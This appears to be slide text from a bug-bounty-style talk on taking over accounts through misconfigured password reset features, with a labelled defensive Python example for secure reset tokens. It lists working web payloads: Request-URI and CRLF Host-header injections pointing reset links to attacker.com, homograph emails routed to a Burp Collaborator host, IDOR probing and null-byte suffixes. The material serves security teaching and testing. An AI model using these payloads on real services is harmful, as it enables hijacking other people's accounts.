Account Takeover via Exploiting
Misconfigured Password Reset Feature
By Tuhin Bose
Who am I?
AGENDA
What is Password Reset Feature?
Password Reset Implementation Techniques Used by Developers
ATO via Hacking Misconfigured Password Reset Feature
Conclusion & QNA
What is Password Reset Feature?
Password reset is the action of invalidating the current password for an
account on an application and then setting a new one. Most services have a
password reset feature (a "Forgot Password" service) which allows you to
reset your password.
Password Reset Implementation Techniques Used by Developers
ATO via Hacking Misconfigured Password Reset Feature
2. Modifying Request-URI
POST https://attacker.com/forgot-password HTTP/1.1
POST @attacker.com/forgot-password HTTP/1.1
POST :@attacker.com/forgot-password HTTP/1.1
POST /forgot-password@attacker.com HTTP/1.1
5. Insecure Direct Object Reference (IDOR)
Use Param Miner to get extra parameters (or append previously known parameters) in the request. Now try IDOR.
6. Try homograph on password reset.
email=victim@gmail.com
email=victim@gmаil.com
email=victim@xn--gmil-63d.com
Using Unicode: Cyrillic Small Letter A
https://github.com/UndeadSec/EvilURL
Steps to reproduce:
1. Create a new account with tuhin1729@gmail.com.xyz.burpcollaborator.net
2. Go to the password reset page and enter this email: tuhin1729@gmаil.com.xyz.burpcollaborator.net [Here "a" is different]
If it's vulnerable then you'll get the password reset link on your collaborator server.
7. If they are sending an OTP for password reset, try 2FA bypass techniques.
https://tinyurl.com/tuhin1729-2fa
8. Append a .json after the endpoint.
9. Weak Encryption
While generating password reset tokens, sometimes developers use weak encryption algorithms. For example, sometimes they just encrypt the user-id/username of the user + timestamp using some weak encryption algorithm.
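Added defender-side example, not part of the deck: instead of encrypting a predictable user-id + timestamp, a reset token should be random, stored only as a hash, time-limited and single-use, and the link should be built from a configured origin rather than the incoming Host header or Request-URI. The in-memory store, BASE_URL and TTL are hypothetical stand-ins for the application's database and configuration.

```python
import hashlib
import hmac
import secrets
import time
from typing import Dict, Optional

# Hypothetical in-memory store standing in for the application's database:
# maps SHA-256(token) -> record. Only the hash is stored, so a database leak
# does not hand out usable reset links.
_RESET_TOKENS: Dict[str, dict] = {}
# Reset links come from fixed configuration, never from the request's Host
# header or Request-URI (see the Request-URI and CRLF items in this deck).
BASE_URL = "https://example.com"
TOKEN_TTL_SECONDS = 15 * 60


def _digest(token: str) -> str:
    return hashlib.sha256(token.encode("utf-8")).hexdigest()


def issue_reset_token(user_id: str, now: Optional[float] = None) -> str:
    """Generate an unpredictable reset token for user_id and store its hash."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
    _RESET_TOKENS[_digest(token)] = {
        "user_id": user_id,
        "expires": now + TOKEN_TTL_SECONDS,
        "used": False,
    }
    return token


def reset_link(token: str) -> str:
    """Build the emailed link from the configured origin only."""
    return f"{BASE_URL}/reset-password?token={token}"


def consume_reset_token(token: str, now: Optional[float] = None) -> Optional[str]:
    """Return user_id if the token is known, unexpired and unused, else None.

    A successful lookup marks the token used so the link works exactly once.
    Lookup is by hash, so timing of the dictionary lookup reveals nothing a
    caller could turn back into the original token.
    """
    now = time.time() if now is None else now
    record = _RESET_TOKENS.get(_digest(token))
    if record is None or record["used"] or now > record["expires"]:
        return None
    record["used"] = True
    return record["user_id"]
```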
10. CRLF Injection
POST /resetpassword?%0d%0aHost:%20attacker.com HTTP/1.1
11. Change the request method and content-type and observe how the application is responding.
[Screenshots: Original vs. Modified request]
12. Append null bytes after your email and observe the response.
{"email":"tuhinbose70@gmail.com"}
{"email":"tuhinbose70@gmail.com%00"}
%00, %0d%0a, %0d, %0a, %09, %0C, %20